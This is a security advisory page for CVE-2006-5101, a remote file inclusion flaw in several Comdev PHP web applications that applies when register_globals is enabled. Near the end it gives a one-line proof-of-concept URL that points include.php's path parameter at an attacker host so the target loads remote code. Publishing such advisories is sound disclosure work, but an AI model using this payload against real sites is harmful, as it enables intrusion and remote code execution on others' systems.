CVE-2006-5101

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam™
Beyond Security®

SecuriTeam™ Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

	SecuriTeam™ in Your Inbox

	E-mail this CVE-2006-5101 to a friend

New vulnerability?
New tool?
Tell us

Credit:
The information has been provided by OSVDB.
The original articles could be found at:
http://www.osvdb.org/

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Check for CVE-2006-5101

Vulnerability Assessment and Management.
Automated Pen Testing for 50 to 50,000 nodes
beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* Comdev FAQ Support versions 3.1 and 4.1
* Comdev Events Calendar versionss 3.1 and 4.1
* Comdev Photo Gallery versions 3.1 and 4.1
* Comdev News Publisher versions 3.1 and 4.1
* Comdev Web Blogger versions 3.1 and 4.1
* Comdev CSV Importer versions 3.1 and 4.1
* Comdev Guestbook versions 3.1 and 4.1
* Comdev Newsletter versions 3.1 and 4.1
* Comdev Links Directory versions 3.1 and 4.1
* Comdev eCommerce versions 3.1 and 4.1
* Comdev Customer Helpdesk versions 3.1 and 4.1
* Comdev Contact Form versions 3.1 and 4.1
* Comdev Vote Caster versions 3.1 and 4.1

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

CVE Information:
CVE-2006-5101

Proof of concept:
http://[target]/include.php?path["docroot"]=http://[attacker]

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus